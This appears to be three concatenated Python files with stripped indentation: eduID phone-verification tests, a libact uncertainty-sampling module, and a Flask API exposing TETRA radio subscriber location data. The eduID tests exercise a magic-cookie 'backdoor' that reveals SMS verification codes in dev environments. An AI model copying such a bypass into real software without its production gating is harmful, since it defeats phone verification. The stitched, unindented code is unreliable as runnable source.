# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import json
from typing import Any, Dict, Mapping, Optional
from urllib.parse import quote_plus
from mock import patch
from eduid_common.api.testing import EduidAPITestCase
from eduid_webapp.phone.app import PhoneApp, phone_init_app
from eduid_webapp.phone.helpers import PhoneMsg
class PhoneTests(EduidAPITestCase):
app: PhoneApp
def setUp(self):
super(PhoneTests, self).setUp(copy_user_to_private=True)
def load_app(self, config: Mapping[str, Any]) -> PhoneApp:
"""
Called from the parent class, so we can provide the appropriate flask
app for this test case.
"""
return phone_init_app('testing', config)
def update_config(self, config: Dict[str, Any]) -> Dict[str, Any]:
config.update(
{
'available_languages': {'en': 'English', 'sv': 'Svenska'},
'msg_broker_url': 'amqp://dummy',
'am_broker_url': 'amqp://dummy',
'celery_config': {'result_backend': 'amqp', 'task_serializer': 'json'},
'phone_verification_timeout': 7200,
'default_country_code': '46',
'throttle_resend_seconds': 300,
}
)
return config
# parameterized test methods
def _get_all_phone(self, eppn: Optional[str] = None):
"""
GET all phone data for some user
:param eppn: eppn for the user
"""
response = self.browser.get('/all')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = eppn or self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
response2 = client.get('/all')
return json.loads(response2.data)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _post_phone(
self,
mock_phone_validator: Any,
mock_code_verification: Any,
mock_request_user_sync: Any,
mod_data: Optional[dict] = None,
send_data: bool = True,
):
"""
POST phone data to add a new phone number to the test user
:param mod_data: to control what data is POSTed
:param send_data: whether to POST any data at all
"""
mock_phone_validator.return_value = True
mock_code_verification.return_value = u'5250f9a4'
mock_request_user_sync.side_effect = self.request_user_sync
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': '+34670123456',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
if mod_data:
data.update(mod_data)
if send_data:
return client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
return client.post('/new')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _post_primary(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
"""
Set phone number as the primary number for the test user
:param mod_data: to control what data is POSTed
"""
mock_request_user_sync.side_effect = self.request_user_sync
response = self.browser.post('/primary')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/primary', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _remove(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
"""
Remove phone number from the test user
:param mod_data: to control what data is POSTed
"""
mock_request_user_sync.side_effect = self.request_user_sync
response = self.browser.post('/remove')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _resend_code(
self,
mock_phone_validator: Any,
mock_request_user_sync: Any,
mock_code_verification: Any,
mod_data: Optional[dict] = None,
):
"""
Send a POST request to trigger re-sending a verification code for an unverified phone number in the test user.
:param mod_data: to control the data to be POSTed
"""
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'5250f9a4'
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/resend-code', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _get_code_backdoor(
self,
mock_phone_validator: Any,
mock_code_verification: Any,
mock_request_user_sync: Any,
mod_data: Optional[dict] = None,
phone: str = '+34670123456',
code: str = '5250f9a4',
):
"""
POST phone data to generate a verification state,
and try to get the generated code through the backdoor
:param mod_data: to control what data is POSTed
:param phone: the phone to use
:param code: mock verification code
"""
mock_phone_validator.return_value = True
mock_code_verification.return_value = code
mock_request_user_sync.side_effect = self.request_user_sync
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': phone,
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
if mod_data:
data.update(mod_data)
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
client.set_cookie('localhost', key=self.app.conf.magic_cookie_name, value=self.app.conf.magic_cookie)
phone = quote_plus(phone)
eppn = quote_plus(eppn)
return client.get(f'/get-code?phone={phone}&eppn={eppn}')
# actual tests
def test_get_all_phone(self):
phone_data = self._get_all_phone()
self.assertEqual('GET_PHONE_ALL_SUCCESS', phone_data['type'])
self.assertIsNotNone(phone_data['payload']['csrf_token'])
self.assertEqual('+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(True, phone_data['payload']['phones'][0].get('primary'))
self.assertEqual('+34 6096096096', phone_data['payload']['phones'][1].get('number'))
self.assertEqual(False, phone_data['payload']['phones'][1].get('primary'))
def test_post_phone_error_no_data(self):
response = self._post_phone(send_data=False)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
def test_post_phone_country_code(self):
response = self.browser.post('/new')
self.assertEqual(response.status_code, 302) # Redirect to token service
response = self._post_phone()
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
def test_post_phone_no_country_code(self):
data = {'number': '0701234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
def test_post_phone_wrong_csrf(self):
data = {'csrf_token': '<PASSWORD>'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], new_phone_data['payload']['error']['csrf_token'])
def test_post_phone_invalid(self):
data = {'number': '0'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.phone_format'], new_phone_data['payload']['error']['number'])
def test_post_phone_as_verified(self):
data = {'verified': True}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('verified'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('primary'))
def test_post_phone_as_primary(self):
data = {'primary': True}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('verified'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('primary'))
def test_post_phone_bad_swedish_mobile(self):
data = {'number': '0711234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.swedish_mobile_format'], new_phone_data['payload']['error'].get('number'))
def test_post_phone_bad_country_code(self):
data = {'number': '00711234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.e164_format'], new_phone_data['payload']['error'].get('_schema'))
def test_post_primary(self):
response = self._post_primary()
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_SUCCESS', new_phone_data['type'])
self.assertEqual(True, new_phone_data['payload']['phones'][0]['verified'])
self.assertEqual(True, new_phone_data['payload']['phones'][0]['primary'])
self.assertEqual(u'+34609609609', new_phone_data['payload']['phones'][0]['number'])
self.assertEqual(False, new_phone_data['payload']['phones'][1]['verified'])
self.assertEqual(False, new_phone_data['payload']['phones'][1]['primary'])
self.assertEqual(u'+34 6096096096', new_phone_data['payload']['phones'][1]['number'])
def test_post_primary_no_csrf(self):
data = {'csrf_token': ''}
response = self._post_primary(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_FAIL', new_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], new_phone_data['payload']['error']['csrf_token'])
def test_post_primary_unknown(self):
data = {'number': '+66666666666'}
response = self._post_primary(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_FAIL', new_phone_data['type'])
self.assertEqual(PhoneMsg.unknown_phone.value, new_phone_data['payload']['message'])
def test_remove(self):
response = self._remove()
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_remove_primary_other_unverified(self):
data = {'number': '+34 6096096096'}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34609609609', delete_phone_data['payload']['phones'][0].get('number'))
def test_remove_no_csrf(self):
data = {'csrf_token': ''}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_FAIL', delete_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], delete_phone_data['payload']['error']['csrf_token'])
def test_remove_unknown(self):
data = {'number': '+33333333333'}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_FAIL', delete_phone_data['type'])
self.assertEqual('phones.unknown_phone', delete_phone_data['payload']['message'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_remove_primary_other_verified(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/remove')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
self.assertEqual(response2.status_code, 200)
delete_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_resend_code(self):
response = self.browser.post('/resend-code')
self.assertEqual(response.status_code, 302) # Redirect to token service
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', phone_data['type'])
self.assertEqual(u'+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(u'+34 6096096096', phone_data['payload']['phones'][1].get('number'))
def test_resend_code_no_csrf(self):
data = {'csrf_token': '<PASSWORD>'}
response = self._resend_code(mod_data=data)
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual(['CSRF failed to validate'], phone_data['payload']['error']['csrf_token'])
def test_resend_code_unknown(self):
data = {'number': '+66666666666'}
response = self._resend_code(mod_data=data)
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual('user-out-of-sync', phone_data['payload']['message'])
def test_resend_code_throttle(self):
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', phone_data['type'])
self.assertEqual(u'+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(u'+34 6096096096', phone_data['payload']['phones'][1].get('number'))
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual(phone_data['error'], True)
self.assertEqual(phone_data['payload']['message'], 'still-valid-code')
self.assertIsNotNone(phone_data['payload']['csrf_token'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/verify')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
self.assertEqual(u'+34609123321', verify_phone_data['payload']['phones'][2]['number'])
self.assertEqual(True, verify_phone_data['payload']['phones'][2]['verified'])
self.assertEqual(False, verify_phone_data['payload']['phones'][2]['primary'])
self.assertEqual(self.app.proofing_log.db_count(), 1)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify_fail(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/verify')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'wrong_code', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual(verify_phone_data['type'], 'POST_PHONE_VERIFY_FAIL')
self.assertEqual(verify_phone_data['payload']['message'], 'phones.code_invalid_or_expired')
self.assertEqual(self.app.proofing_log.db_count(), 0)
def test_post_phone_duplicated_number(self):
data = {'number': '0701234565'}
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164(self):
data = {'number': '+46701234565'} # e164 format
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual('+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
data = {'number': '0701234565'} # National format
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164_2(self):
data = {'number': '0701234565'} # e164 format
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual('+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
data = {'number': '+46701234565'} # National format
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_get_code_backdoor(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, code.encode('ascii'))
def test_get_code_no_backdoor_in_pro(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'pro'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured1(self):
self.app.conf.magic_cookie = 'magic-cookie'
self.app.conf.magic_cookie_name = ''
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
def test_get_code_no_backdoor_misconfigured2(self):
self.app.conf.magic_cookie = ''
self.app.conf.magic_cookie_name = 'magic'
self.app.conf.environment = 'dev'
code = '0123456'
resp = self._get_code_backdoor(code=code)
self.assertEqual(resp.status_code, 400)
|
""" Uncertainty Sampling
This module contains a class that implements two of the most well-known
uncertainty sampling query strategies: the least confidence method and the
smallest margin method (margin sampling).
"""
import numpy as np
from libact.base.interfaces import QueryStrategy, ContinuousModel, \
ProbabilisticModel
from libact.utils import inherit_docstring_from, zip
class UncertaintySampling(QueryStrategy):
"""Uncertainty Sampling
This class implements Uncertainty Sampling active learning algorithm [1]_.
Parameters
----------
model: :py:class:`libact.base.interfaces.ContinuousModel` or :py:class:`libact.base.interfaces.ProbabilisticModel` object instance
The base model used for training.
method: {'lc', 'sm', 'entropy'}, optional (default='lc')
least confidence (lc), it queries the instance whose posterior
probability of being positive is nearest 0.5 (for binary
classification);
smallest margin (sm), it queries the instance whose posterior
probability gap between the most and the second probable labels is
minimal;
entropy, requires :py:class:`libact.base.interfaces.ProbabilisticModel`
to be passed in as model parameter;
Attributes
----------
model: :py:class:`libact.base.interfaces.ContinuousModel` or :py:class:`libact.base.interfaces.ProbabilisticModel` object instance
The model trained in last query.
Examples
--------
Here is an example of declaring a UncertaintySampling query_strategy
object:
.. code-block:: python
from libact.query_strategies import UncertaintySampling
from libact.models import LogisticRegression
qs = UncertaintySampling(
dataset, # Dataset object
model=LogisticRegression(C=0.1)
)
Note that the model given in the :code:`model` parameter must be a
:py:class:`ContinuousModel` which supports predict_real method.
References
----------
.. [1] <NAME>. "Active learning literature survey." University of
Wisconsin, Madison 52.55-66 (2010): 11.
"""
def __init__(self, *args, **kwargs):
super(UncertaintySampling, self).__init__(*args, **kwargs)
self.model = kwargs.pop('model', None)
if self.model is None:
raise TypeError(
"__init__() missing required keyword-only argument: 'model'"
)
if not isinstance(self.model, ContinuousModel) and \
not isinstance(self.model, ProbabilisticModel):
raise TypeError(
"model has to be a ContinuousModel or ProbabilisticModel"
)
self.model.train(self.dataset)
self.method = kwargs.pop('method', 'lc')
if self.method not in ['lc', 'sm', 'entropy']:
raise TypeError(
"supported methods are ['lc', 'sm', 'entropy'], the given one "
"is: " + self.method
)
if self.method=='entropy' and \
not isinstance(self.model, ProbabilisticModel):
raise TypeError(
"method 'entropy' requires model to be a ProbabilisticModel"
)
def _get_scores(self):
dataset = self.dataset
self.model.train(dataset)
unlabeled_entry_ids, X_pool = dataset.get_unlabeled_entries()
if isinstance(self.model, ProbabilisticModel):
dvalue = self.model.predict_proba(X_pool)
elif isinstance(self.model, ContinuousModel):
dvalue = self.model.predict_real(X_pool)
if self.method == 'lc': # least confident
score = -np.max(dvalue, axis=1)
elif self.method == 'sm': # smallest margin
if np.shape(dvalue)[1] > 2:
# Find 2 largest decision values
dvalue = -(np.partition(-dvalue, 2, axis=1)[:, :2])
score = -np.abs(dvalue[:, 0] - dvalue[:, 1])
elif self.method == 'entropy':
score = np.sum(-dvalue * np.log(dvalue), axis=1)
return zip(unlabeled_entry_ids, score)
def make_query(self, return_score=False):
"""Return the index of the sample to be queried and labeled and
selection score of each sample. Read-only.
No modification to the internal states.
Returns
-------
ask_id : int
The index of the next unlabeled sample to be queried and labeled.
score : list of (index, score) tuple
Selection score of unlabled entries, the larger the better.
"""
dataset = self.dataset
# unlabeled_entry_ids, _ = dataset.get_unlabeled_entries()
unlabeled_entry_ids, scores = zip(*self._get_scores())
ask_id = np.argmax(scores)
if return_score:
return unlabeled_entry_ids[ask_id], \
list(zip(unlabeled_entry_ids, scores))
else:
return unlabeled_entry_ids[ask_id]
|
<gh_stars>1-10
from pymongo.collection import ReturnDocument
from flask_restful import Resource, reqparse
import pymongo
from bson.json_util import dumps
import json
from flask import jsonify, Response
import datetime
from routes.tetra import track, calls_group, calls_subscriber, calls_detail
'''
All the Tetra API endpoints
'''
class node_load(Resource):
'''
GET the node load data for the bar graph
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self):
# Get the node load data already formatted for the eCharts bar graph
node_loads = self.DB['tetra_node_load'].find_one(
{
'type': 'bar'
}
)
return(jsonify(json.loads(dumps(node_loads))))
class node_subscribers(Resource):
'''
GET the total subscriber count per node
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self):
# Get subscriber count already formatted for the eCharts bar graph
sub_loads = self.DB['tetra_node_subscribers'].find_one(
{
'type': 'bar'
}
)
return(jsonify(json.loads(dumps(sub_loads))))
class ts_load(Resource):
'''
GET the total timeslot usage count
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self):
# Get timeslot usage already formatted for the eCharts radar chart
ts_loads = self.DB['tetra_node_load'].find_one(
{
'type': 'radar'
}
)
return(jsonify(json.loads(dumps(ts_loads))))
class radio_count(Resource):
'''
GET the online radio count
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, node):
# Get total online radio count
# node = all
radio_count = self.DB['tetra_radio_count'].find_one(
{
'node': node
}
)
return(jsonify(json.loads(dumps(radio_count))))
class subscribers(Resource):
'''
GET the subscriber list
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self,):
# Get subscriber list (all)
subscribers = self.DB['tetra_subscribers'].find({}, {'_id': False}).sort("ssi", pymongo.ASCENDING)
return(jsonify(json.loads(dumps(subscribers))))
class call_stats(Resource):
'''
GET the call count stats
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, call_type, range_sec):
# Get call count stats based on type
# Group, Individual or SDS
stats = self.DB['tetra_call_stats'].find_one(
{
'type' : call_type,
'range_sec' : range_sec
},
{'_id': False})
return(jsonify(json.loads(dumps(stats))))
class call_history(Resource):
'''
GET the call count history for a time range
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, time_range):
# Get call count stats for a specified time range
# Group and individual
# time_range = seconds from now
stats = self.DB['tetra_call_stats'].find_one(
{
'type' : 'history',
'range' : time_range
},
{'_id': False})
return(jsonify(json.loads(dumps(stats))))
class subscriber_detail(Resource):
'''
GET subscriber information details
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, issi):
# construct MongoDB query
filter={
'issi': int(issi)
}
sort=list({
'unix': -1
}.items())
limit=1
results = self.DB['sds_data'].find(
filter=filter,
sort=sort,
limit=limit
)
try:
results = results[0]
timestamp = str(results['processed_time'] + datetime.timedelta(hours=8))
lat = results['decimal_degrees']['latitude']
lon = results['decimal_degrees']['longitude']
url = f"https://www.google.com/maps/search/?api=1&query={lat},{lon}"
detail = {
'timestamp' : timestamp,
'node' : results['node'],
'gps' : True,
'rssi' : results['rssi'],
'location' : results['decimal_degrees'],
'maps_url' : url,
'accuracy' : results['uncertainty'],
'velocity' : results['velocity'],
'direction' : results['direction'],
'angle' : results['angle']
}
except IndexError:
detail = {
'gps' : False,
}
return(jsonify(json.loads(dumps(detail))))
class subscriber_update(Resource):
'''
POST subscriber comment info
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def post(self):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("ssi")
parser.add_argument("comment")
args = parser.parse_args()
# MongoDB query
try:
new = self.DB['tetra_subscribers'].find_one_and_update(
{
"ssi": int(args['ssi']),
},
{
"$set":
{
"comment": args['comment'],
}
},
upsert=True,
return_document=ReturnDocument.AFTER,
)
# Remove everything except comment for change history
new.pop('_id', None)
new.pop('node', None)
new.pop('group', None)
new.pop('talkgroup', None)
new.pop('gps', None)
new.pop('count', None)
new['timestamp'] = datetime.datetime.utcnow()
# Update the changes collection
self.DB['tetra_subscriber_changes'].insert(new)
return({'success': True, 'message': 'Updated {}'.format(args['ssi'])})
except Exception as e:
return({'success': False, 'message': f'{str(e)}'})
class subscriber_kml_check(Resource):
'''
GET for pre-checking GPS points
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, params):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("issi")
parser.add_argument("start")
parser.add_argument("end")
args = parser.parse_args()
results = track.check(args, self.DB, self.env)
return(jsonify(json.loads(dumps(results))))
class subscriber_kml(Resource):
'''
GET for generating a .kml track for an individual subscriber
'''
def __init__(self, **kwargs):
self.DB = kwargs['DB']
self.env = kwargs['env']
def get(self, params):
# Initilize request parser
parser = reqparse.RequestParser()
# Parse arguments from form data
parser.add_argument("issi")
parser.add_argument("start")
parser.add_argument("end")
args = parser.parse_args()
kml_filename = f"{args['issi']} - {args['start']}-{args['end']}.kml"
try:
kml_file = track.get(args, self.DB, self.env)
if kml_file:
# Create response as a file
kml_response = Response(
kml_file,
